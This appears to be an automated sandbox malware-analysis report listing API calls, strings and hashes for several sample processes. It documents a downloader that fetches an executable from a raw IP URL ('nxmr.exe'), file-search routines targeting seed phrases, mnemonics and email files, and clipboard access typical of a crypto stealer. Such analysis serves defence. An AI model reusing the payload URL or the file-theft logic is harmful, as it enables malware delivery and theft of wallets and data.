Opcode ID: 4b36ca67c7791d2939c1648165110d1298ac216d1b3f773cf7467220a26e3afd
Instruction ID: e6a3738c6f54ad57f9b03f0b719622f10be4595a3eb67d9e66196ffd53f09692
Opcode Fuzzy Hash: 4b36ca67c7791d2939c1648165110d1298ac216d1b3f773cf7467220a26e3afd
Instruction Fuzzy Hash: B501A7B064031CABD730DB609C49FE57338AB44700F0085ADB719A20D3EAB85AC6DFA9

Function 007C1360 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 26
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExpandEnvironmentStringsW.KERNEL32(%systemdrive%,?,00000104), ref: 007C137A
wsprintfW.USER32 ref: 007C1393
PathFileExistsW.KERNELBASE(?), ref: 007C13A3

Strings

^Gv, xrefs: 007C13A3
%systemdrive%, xrefs: 007C1375
%s\Program Files (x86), xrefs: 007C1387

Memory Dump Source

Source File: 0000000B.00000002.1777135939.00000000007C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007C0000, based on PE: true

Associated: 0000000B.00000002.1777112385.00000000007C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.1777160846.00000000007C2000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.1777184777.00000000007C4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7c0000_78476062.jbxd

Similarity

API ID: EnvironmentExistsExpandFilePathStringswsprintf
String ID: %s\Program Files (x86)$%systemdrive%$^Gv
API String ID: 3337111443-995220092
Opcode ID: a20ff8feba44f5843c0ce4ae8aced50d4ac29fb4be638c2faad2ce3966a6d724
Instruction ID: 9f170bfdc358e186a7a16c9a8e632c63c4e516ac9bebb29727beb5cf6895f4f3
Opcode Fuzzy Hash: a20ff8feba44f5843c0ce4ae8aced50d4ac29fb4be638c2faad2ce3966a6d724
Instruction Fuzzy Hash: 4AE065B150021C6BDB10DB60AC49FE57328A701704F4086ADAA5991152FAB896DADBA9

Function 007C1460 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 18
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 007C1468

Part of subcall function 007C1360: ExpandEnvironmentStringsW.KERNEL32(%systemdrive%,?,00000104), ref: 007C137A
Part of subcall function 007C1360: wsprintfW.USER32 ref: 007C1393
Part of subcall function 007C1360: PathFileExistsW.KERNELBASE(?), ref: 007C13A3

Part of subcall function 007C13C0: ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 007C13DA
Part of subcall function 007C13C0: wsprintfW.USER32 ref: 007C13F3
Part of subcall function 007C13C0: PathFileExistsW.KERNELBASE(?), ref: 007C1403

Part of subcall function 007C10B0: GetTickCount.KERNEL32 ref: 007C10B9
Part of subcall function 007C10B0: srand.MSVCR90 ref: 007C10C0
Part of subcall function 007C10B0: DeleteUrlCacheEntryW.WININET(?), ref: 007C10CC
Part of subcall function 007C10B0: ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 007C10EA
Part of subcall function 007C10B0: rand.MSVCR90 ref: 007C10F0
Part of subcall function 007C10B0: rand.MSVCR90 ref: 007C1104
Part of subcall function 007C10B0: wsprintfW.USER32 ref: 007C112B
Part of subcall function 007C10B0: InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36,00000000,00000000,00000000,00000000), ref: 007C1141
Part of subcall function 007C10B0: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 007C116D
Part of subcall function 007C10B0: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 007C119C
Part of subcall function 007C10B0: InternetReadFile.WININET(00000000,?,00000103,?), ref: 007C11CF
Part of subcall function 007C10B0: WriteFile.KERNELBASE(000000FF,?,00000000,?,00000000), ref: 007C1200
Part of subcall function 007C10B0: CloseHandle.KERNEL32(000000FF), ref: 007C120F
Part of subcall function 007C10B0: wsprintfW.USER32 ref: 007C1228

Strings

http://185.215.113.84/nxmr.exe, xrefs: 007C1486

Memory Dump Source

Source File: 0000000B.00000002.1777135939.00000000007C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007C0000, based on PE: true

Associated: 0000000B.00000002.1777112385.00000000007C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.1777160846.00000000007C2000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.1777184777.00000000007C4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7c0000_78476062.jbxd

Similarity

API ID: File$wsprintf$EnvironmentExpandInternetStrings$ExistsOpenPathrand$CacheCloseCountCreateDeleteEntryHandleReadSleepTickWritesrand
String ID: http://185.215.113.84/nxmr.exe
API String ID: 4035879952-3066490085
Opcode ID: 81c40b1101510f14292347b90868af69178175dee93d69745f4f7a16447cb7e7
Instruction ID: f35e580005db832898fc289c939a83ba4657622f1df7dce5e86af5ea3af482ef
Opcode Fuzzy Hash: 81c40b1101510f14292347b90868af69178175dee93d69745f4f7a16447cb7e7
Instruction Fuzzy Hash: 1CD0A7A5500395A1A10532B27C0BF3F33986D03781FC4843EB446C8883ED4CD50590B2

Analysis Process: fontdrvhost.exePID: 5444, Parent PID: 5536COMMON

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00000270F6671CF4 Relevance: 3.3, APIs: 2, Instructions: 278
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAcceptConnectPort.NTDLL ref: 00000270F6671F92
CloseHandle.KERNELBASE ref: 00000270F6671F9B

Memory Dump Source

Source File: 0000000C.00000002.2099204640.00000270F6670000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000270F6670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_270f6670000_fontdrvhost.jbxd

Similarity

API ID: AcceptCloseConnectHandlePort
String ID:
API String ID: 3811980168-0
Opcode ID: c28fd07678fc221e1754ee083f118103e9e8097afeb12f13d48dc470bfa4e84b
Instruction ID: f289e0753cfff43cbf418a9f887817d30438b68ed67ce59bdde49bdc090d208d
Opcode Fuzzy Hash: c28fd07678fc221e1754ee083f118103e9e8097afeb12f13d48dc470bfa4e84b
Instruction Fuzzy Hash: 9E91A130508E088FDB74EB58D4857E5B3E1FB98314F14465EE48FC7696EE34A9468B82

Function 00000270F6670AC8 Relevance: 3.2, APIs: 2, Instructions: 185
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAcceptConnectPort.NTDLL ref: 00000270F6670C14
NtAcceptConnectPort.NTDLL ref: 00000270F6670C5E

Memory Dump Source

Source File: 0000000C.00000002.2099204640.00000270F6670000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000270F6670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_270f6670000_fontdrvhost.jbxd

Similarity

API ID: AcceptConnectPort
String ID:
API String ID: 1658770261-0
Opcode ID: 275693e7d66e5d53f7e2184dfa7c88ce453f9d9d0d3e8ba4525500231a394657
Instruction ID: 68914308d25dd2683d267fc8216080732a8ffd61b566a35454427b50c537f0a8
Opcode Fuzzy Hash: 275693e7d66e5d53f7e2184dfa7c88ce453f9d9d0d3e8ba4525500231a394657
Instruction Fuzzy Hash: 8251463091CA254AE33CA67888D9278B7E0F78130AF34055ED0F7C5993ED25D68B87A3

Function 00000270F6671AA4 Relevance: 3.2, APIs: 2, Instructions: 150
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAcceptConnectPort.NTDLL ref: 00000270F6671AE9

Part of subcall function 00000270F6671870: GetProcessMitigationPolicy.KERNELBASE ref: 00000270F6671943

NtAcceptConnectPort.NTDLL ref: 00000270F6671BE3

Memory Dump Source

Source File: 0000000C.00000002.2099204640.00000270F6670000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000270F6670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_270f6670000_fontdrvhost.jbxd

Similarity

API ID: AcceptConnectPort$MitigationPolicyProcess
String ID:
API String ID: 2923266908-0
Opcode ID: e7c877b781110a0d6e647df344fb2e40eb660a4b7f668a210715c22aed20397b
Instruction ID: 42bfa32747f7340b5441cfd0e731924346e8608d8e1add8fe67abe2639575ab7
Opcode Fuzzy Hash: e7c877b781110a0d6e647df344fb2e40eb660a4b7f668a210715c22aed20397b
Instruction Fuzzy Hash: 9941DF30208B488FDB54EF6C98C97957B91EB55320F0443AEE85ECB2D7DE34C9498796

Function 00000270F66715C0 Relevance: 1.6, APIs: 1, Instructions: 76
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,?,?,00000000,00000270F6671E3A), ref: 00000270F6671654

Memory Dump Source

Source File: 0000000C.00000002.2099204640.00000270F6670000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000270F6670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_270f6670000_fontdrvhost.jbxd

Similarity

API ID: AcceptConnectPort
String ID:
API String ID: 1658770261-0
Opcode ID: 1eb38bd4e9810c4692bda8c47b34b9a63fb6abd40dd4841afe63035e04063970
Instruction ID: fe6e3d6b9c83aa0fd67f2443d1e31a5af1653a29d19894cd258fec8efd18bca9
Opcode Fuzzy Hash: 1eb38bd4e9810c4692bda8c47b34b9a63fb6abd40dd4841afe63035e04063970
Instruction Fuzzy Hash: 2B213E71518B088FDB58DF58C4C9A6AF7E1FB68309F180A6FE44AC6660DB31D589CB42

Function 00000270F6671870 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessMitigationPolicy.KERNELBASE ref: 00000270F6671943

Memory Dump Source

Source File: 0000000C.00000002.2099204640.00000270F6670000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000270F6670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_270f6670000_fontdrvhost.jbxd

Similarity

API ID: MitigationPolicyProcess
String ID:
API String ID: 1088084561-0
Opcode ID: 26f3b5b73fc16ab59c2c5e195c9b4eeee4e831d251455a47b6c64e26f9aa79e3
Instruction ID: f0a3aa3d4d3f65a7c48c809726b39d669f2aa80f3d1b3806f1bc7cbab66d451d
Opcode Fuzzy Hash: 26f3b5b73fc16ab59c2c5e195c9b4eeee4e831d251455a47b6c64e26f9aa79e3
Instruction Fuzzy Hash: 15317A30118A07CAEBB597A8C4D87F1B2E5EBA431AF2801AAC419D75D1EE75C5CEC641

Non-executed Functions

Function 00000270F6670511 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2099204640.00000270F6670000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000270F6670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_270f6670000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 247c94ababd4710b0196191072c8bbb5758b71c13019f7a788401a9348e82e18
Instruction ID: 1684949b0e2b346c4f6e13502068689c61c9b2d028cdf62c4328b71d82623ec0
Opcode Fuzzy Hash: 247c94ababd4710b0196191072c8bbb5758b71c13019f7a788401a9348e82e18
Instruction Fuzzy Hash: CFB01130E2AA00C2E3880E0AB8023A0F2B2C30B300F02B2322002F3220CA28CC08028F

Analysis Process: 640832494.exePID: 4468, Parent PID: 7744COMMON

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 001D1A20 Relevance: 75.4, APIs: 24, Strings: 19, Instructions: 192
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCR90 ref: 001D1A61
memset.MSVCR90 ref: 001D1A77
PathCombineW.SHLWAPI(?,msocache,001DA264), ref: 001D1A8F
FindFirstFileW.KERNELBASE(?,?), ref: 001D1AA3
lstrcmpW.KERNEL32(?,001DA268), ref: 001D1AD3
lstrcmpW.KERNEL32(?,001DA26C), ref: 001D1AE9
PathCombineW.SHLWAPI(?,msocache,?), ref: 001D1B05
CharLowerW.USER32(?), ref: 001D1B39
PathMatchSpecW.SHLWAPI(?,*.txt), ref: 001D1BA8
PathMatchSpecW.SHLWAPI(?,*.doc), ref: 001D1BC2
PathMatchSpecW.SHLWAPI(?,*.rtf), ref: 001D1BDC
PathMatchSpecW.SHLWAPI(?,*.csv), ref: 001D1BF6
PathMatchSpecW.SHLWAPI(?,*.md), ref: 001D1C10
PathMatchSpecW.SHLWAPI(?,*.mnemonic), ref: 001D1C2A
PathMatchSpecW.SHLWAPI(?,*.json), ref: 001D1C44
PathMatchSpecW.SHLWAPI(?,*.pdf), ref: 001D1C5E
PathMatchSpecW.SHLWAPI(?,*.seed), ref: 001D1C74
PathMatchSpecW.SHLWAPI(?,*.eml), ref: 001D1C8A
PathMatchSpecW.SHLWAPI(?,*.msg), ref: 001D1CA0
PathMatchSpecW.SHLWAPI(?,*.log), ref: 001D1CB6
PathMatchSpecW.SHLWAPI(?,*.mbox), ref: 001D1CCC
PathCombineW.SHLWAPI(?,msocache,?), ref: 001D1CE8
FindNextFileW.KERNELBASE(000000FF,?), ref: 001D1D0B
CloseHandle.KERNELBASE(000000FF), ref: 001D1D20

Strings

*.log, xrefs: 001D1CAA
*.msg, xrefs: 001D1C94
boot, xrefs: 001D1A30
*.csv, xrefs: 001D1BEA
*.md, xrefs: 001D1C04
*.txt, xrefs: 001D1B9C
*.seed, xrefs: 001D1C68
windows, xrefs: 001D1A29, 001D1B6D
*.rtf, xrefs: 001D1BD0
intel, xrefs: 001D1A3E
msocache, xrefs: 001D1A45, 001D1A87, 001D1AFD, 001D1CE0
perflogs, xrefs: 001D1A37
*.mbox, xrefs: 001D1CC0
*.doc, xrefs: 001D1BB6
*.json, xrefs: 001D1C38
*.eml, xrefs: 001D1C7E
*.mnemonic, xrefs: 001D1C1E
*.pdf, xrefs: 001D1C52
$recycle.bin, xrefs: 001D1A4C

Memory Dump Source

Source File: 0000000D.00000002.3943494249.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000D.00000002.3943301182.00000000001D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000D.00000002.3943547429.00000000001D3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000D.00000002.3943593728.00000000001DB000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000D.00000002.3943719205.00000000001DE000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1d0000_640832494.jbxd

Similarity

API ID: Path$MatchSpec$Combine$FileFindlstrcmpmemset$CharCloseFirstHandleLowerNext
String ID: $recycle.bin$*.csv$*.doc$*.eml$*.json$*.log$*.mbox$*.md$*.mnemonic$*.msg$*.pdf$*.rtf$*.seed$*.txt$boot$intel$msocache$perflogs$windows
API String ID: 3613755899-1169052343
Opcode ID: 1e24e6ae73d685792dc453a730fb889eb6d70407a871f1c6e690a3b59ccb48a1
Instruction ID: e79bff00f382358a05a24c351d1eab97779e39c722c3b024c6854e6deec92b36
Opcode Fuzzy Hash: 1e24e6ae73d685792dc453a730fb889eb6d70407a871f1c6e690a3b59ccb48a1
Instruction Fuzzy Hash: 527173B1A42219BBCB20DFA1DD88BDD7778BF14700F44859BE619A2240E774DB88CF56

Function 001D1F60 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 32
sleepsynchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 001D1F69
CreateMutexA.KERNELBASE(00000000,00000000,hh6657577447), ref: 001D1F78
GetLastError.KERNEL32 ref: 001D1F81
ExitProcess.KERNEL32 ref: 001D1F90
CreateThread.KERNELBASE(00000000,00000000,Function_00001EF0,00000000,00000000,00000000), ref: 001D1FB1
Sleep.KERNELBASE(000007D0), ref: 001D1FBC
Sleep.KERNELBASE(00001388), ref: 001D1FCC

Strings

hh6657577447, xrefs: 001D1F6F

Memory Dump Source

Source File: 0000000D.00000002.3943494249.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000D.00000002.3943301182.00000000001D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000D.00000002.3943547429.00000000001D3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000D.00000002.3943593728.00000000001DB000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000D.00000002.3943719205.00000000001DE000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1d0000_640832494.jbxd

Similarity

API ID: Sleep$Create$ErrorExitLastMutexProcessThread
String ID: hh6657577447
API String ID: 302559243-755765026
Opcode ID: 474c775d50cdd40512399787e9411c2ba1638de91440af818473b88a34cc6723
Instruction ID: b18036b30ba066bce58033858c6122cca114834ce9da203513cd51ce45300613
Opcode Fuzzy Hash: 474c775d50cdd40512399787e9411c2ba1638de91440af818473b88a34cc6723
Instruction Fuzzy Hash: 68F01234A87300B7E3102BE09D4FB197771AB15B52F100013F715B89D0CBA4A6444A27

Function 001D1300 Relevance: 13.6, APIs: 9, Instructions: 125
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wfopen.MSVCR90 ref: 001D1316
fgetws.MSVCR90 ref: 001D133B
fclose.MSVCR90 ref: 001D1513

Part of subcall function 001D1120: iswspace.MSVCR90 ref: 001D114E
Part of subcall function 001D1120: iswspace.MSVCR90 ref: 001D1189

memset.MSVCR90 ref: 001D13C8
wcstok.MSVCR90 ref: 001D13DC
wcstok.MSVCR90 ref: 001D143B
memset.MSVCR90 ref: 001D1487
wcscat.MSVCR90 ref: 001D14CD
wcscat.MSVCR90 ref: 001D14EA

Memory Dump Source

Source File: 0000000D.00000002.3943494249.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000D.00000002.3943301182.00000000001D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000D.00000002.3943547429.00000000001D3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000D.00000002.3943593728.00000000001DB000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000D.00000002.3943719205.00000000001DE000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1d0000_640832494.jbxd

Similarity

API ID: iswspacememsetwcscatwcstok$_wfopenfclosefgetws
String ID:
API String ID: 3041731120-0
Opcode ID: 4c2dfef7e6abe73e84ead93fa3a886351be37c550b53791ef0be1e323b5eca82
Instruction ID: b5f1a654321cb6fd372122a5c43781e93ca6b968c5826b486d4df6b3e11537ad
Opcode Fuzzy Hash: 4c2dfef7e6abe73e84ead93fa3a886351be37c550b53791ef0be1e323b5eca82
Instruction Fuzzy Hash: 6C5169B1C00228BADB24DB50DC46BD973B8BF54300F04C0A6E40966341EB759BDADFE2

Function 001D1000 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 41
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 001D101A
wsprintfW.USER32 ref: 001D1033
PathFileExistsW.KERNELBASE(?), ref: 001D1043
CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000002,00000000), ref: 001D1069
CloseHandle.KERNELBASE(000000FF), ref: 001D1085

Strings

%temp%, xrefs: 001D1015
%s\f7f7ff7ffd6.txt, xrefs: 001D1027

Memory Dump Source

Source File: 0000000D.00000002.3943494249.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000D.00000002.3943301182.00000000001D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000D.00000002.3943547429.00000000001D3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000D.00000002.3943593728.00000000001DB000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000D.00000002.3943719205.00000000001DE000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1d0000_640832494.jbxd

Similarity

API ID: File$CloseCreateEnvironmentExistsExpandHandlePathStringswsprintf
String ID: %s\f7f7ff7ffd6.txt$%temp%
API String ID: 750032643-3186088261
Opcode ID: f05840a501c20a3aba7b2fa312e3b8145a0b1271181245bacc45363d070479fb
Instruction ID: 944a23433c53c2a4cbd1cd40b67c57abfc7603f2a76a5e5150bec7988d214b61
Opcode Fuzzy Hash: f05840a501c20a3aba7b2fa312e3b8145a0b1271181245bacc45363d070479fb
Instruction Fuzzy Hash: BD01A7B054131CBBD720DB609C4AFE67338AB40704F0046A5B725961D1DBB05AC4DFA6

Function 001D1E30 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLogicalDrives.KERNELBASE ref: 001D1E36
RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 001D1E84
RegQueryValueExW.KERNELBASE(?,NoDrives,00000000,00000000,00000000,00000004), ref: 001D1EB1
RegCloseKey.KERNELBASE(?), ref: 001D1ECE

Strings

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 001D1E77
NoDrives, xrefs: 001D1EA8

Memory Dump Source

Source File: 0000000D.00000002.3943494249.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000D.00000002.3943301182.00000000001D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000D.00000002.3943547429.00000000001D3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000D.00000002.3943593728.00000000001DB000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000D.00000002.3943719205.00000000001DE000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1d0000_640832494.jbxd

Similarity

API ID: CloseDrivesLogicalOpenQueryValue
String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
API String ID: 2666887985-3471754645
Opcode ID: 914213859fbf02d81dba0799110a3d6b1d1c1d9082e0d91c3544f6970be1a183
Instruction ID: b98f5122bc037286e0a7ad2d9e4fbd9d13403e9602569165bb69c66fceed131f
Opcode Fuzzy Hash: 914213859fbf02d81dba0799110a3d6b1d1c1d9082e0d91c3544f6970be1a183
Instruction Fuzzy Hash: 2411DA71E4120AEBDB14CFD5C949BFEBBB5FB48704F10850AE921A7280D7786A45CF91

Function 001D1DB0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDriveTypeW.KERNELBASE(001D1D8F), ref: 001D1DBD
QueryDosDeviceW.KERNELBASE(001D1D8F,?,00000208), ref: 001D1DFC
StrCmpNW.KERNELBASE(?,\??\,00000004), ref: 001D1E14

Strings

\??\, xrefs: 001D1E08

Memory Dump Source

Source File: 0000000D.00000002.3943494249.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000D.00000002.3943301182.00000000001D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000D.00000002.3943547429.00000000001D3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000D.00000002.3943593728.00000000001DB000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000D.00000002.3943719205.00000000001DE000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1d0000_640832494.jbxd

Similarity

API ID: DeviceDriveQueryType
String ID: \??\
API String ID: 1681518211-3047946824
Opcode ID: ee374f4c070dc330bef8b8a5920575e5636d2292eb6f8ac55509376e0454b8c7
Instruction ID: 25edc793303f9fd8dac72853e8f9269f427bb3d9562e74bbf6e533a9c8872af9
Opcode Fuzzy Hash: ee374f4c070dc330bef8b8a5920575e5636d2292eb6f8ac55509376e0454b8c7
Instruction Fuzzy Hash: A90112B494120CFBCB24DF95DD896D9B7B9AF04705F0080AAEA04A7240D7309FC5CF95

Function 001D1EF0 Relevance: 1.5, APIs: 1, Instructions: 35
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 001D1E30: GetLogicalDrives.KERNELBASE ref: 001D1E36
Part of subcall function 001D1E30: RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 001D1E84
Part of subcall function 001D1E30: RegQueryValueExW.KERNELBASE(?,NoDrives,00000000,00000000,00000000,00000004), ref: 001D1EB1
Part of subcall function 001D1E30: RegCloseKey.KERNELBASE(?), ref: 001D1ECE

ExitThread.KERNEL32 ref: 001D1F51

Part of subcall function 001D1D50: lstrcpyW.KERNEL32(?,?,?,?,00000019), ref: 001D1DA3

Part of subcall function 001D1A20: memset.MSVCR90 ref: 001D1A61
Part of subcall function 001D1A20: memset.MSVCR90 ref: 001D1A77
Part of subcall function 001D1A20: PathCombineW.SHLWAPI(?,msocache,001DA264), ref: 001D1A8F
Part of subcall function 001D1A20: FindFirstFileW.KERNELBASE(?,?), ref: 001D1AA3
Part of subcall function 001D1A20: lstrcmpW.KERNEL32(?,001DA268), ref: 001D1AD3
Part of subcall function 001D1A20: lstrcmpW.KERNEL32(?,001DA26C), ref: 001D1AE9
Part of subcall function 001D1A20: PathCombineW.SHLWAPI(?,msocache,?), ref: 001D1B05
Part of subcall function 001D1A20: FindNextFileW.KERNELBASE(000000FF,?), ref: 001D1D0B
Part of subcall function 001D1A20: CloseHandle.KERNELBASE(000000FF), ref: 001D1D20

Memory Dump Source

Source File: 0000000D.00000002.3943494249.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000D.00000002.3943301182.00000000001D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000D.00000002.3943547429.00000000001D3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000D.00000002.3943593728.00000000001DB000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000D.00000002.3943719205.00000000001DE000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1d0000_640832494.jbxd

Similarity

API ID: CloseCombineFileFindPathlstrcmpmemset$DrivesExitFirstHandleLogicalNextOpenQueryThreadValuelstrcpy
String ID:
API String ID: 717983626-0
Opcode ID: 0048c276c55be94f7f385b2fcf54477f94869bda82b2460ccba7ad9156bf35ab
Instruction ID: 531a8beeb0f5a1ee4d9fcf417954ddd094fc2ae5036d1ed13152afe3e15c78d0
Opcode Fuzzy Hash: 0048c276c55be94f7f385b2fcf54477f94869bda82b2460ccba7ad9156bf35ab
Instruction Fuzzy Hash: AB013CB5C04208FBCB04DBE4C946ADEBBB5AB18304F1040ABE405B3301E331AA88CB56

Function 001D1D50 Relevance: 1.3, APIs: 1, Instructions: 32
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 001D1DB0: GetDriveTypeW.KERNELBASE(001D1D8F), ref: 001D1DBD

lstrcpyW.KERNEL32(?,?,?,?,00000019), ref: 001D1DA3

Memory Dump Source

Source File: 0000000D.00000002.3943494249.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000D.00000002.3943301182.00000000001D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000D.00000002.3943547429.00000000001D3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000D.00000002.3943593728.00000000001DB000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000D.00000002.3943719205.00000000001DE000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1d0000_640832494.jbxd

Similarity

API ID: DriveTypelstrcpy
String ID:
API String ID: 3664088370-0
Opcode ID: 9f0cbeaf85bf0b0ba68f9ccdd1d595d4308ec744e374eaa9b274906bf5e9215b
Instruction ID: e298bb17745188083742bdce57f69076ed1b613c638a81e5c98a14a7ad50fcbc
Opcode Fuzzy Hash: 9f0cbeaf85bf0b0ba68f9ccdd1d595d4308ec744e374eaa9b274906bf5e9215b
Instruction Fuzzy Hash: FBF04476D00208BBCB04DFE8D849BDEB7B8EF44300F0085AAE8199B240E335AB08CB45

Non-executed Functions

Function 001D1530 Relevance: 37.8, APIs: 25, Instructions: 292
clipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenClipboard.USER32(00000000), ref: 001D1554
GetClipboardData.USER32(0000000D), ref: 001D1567
CloseClipboard.USER32 ref: 001D1576

Memory Dump Source

Source File: 0000000D.00000002.3943494249.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true

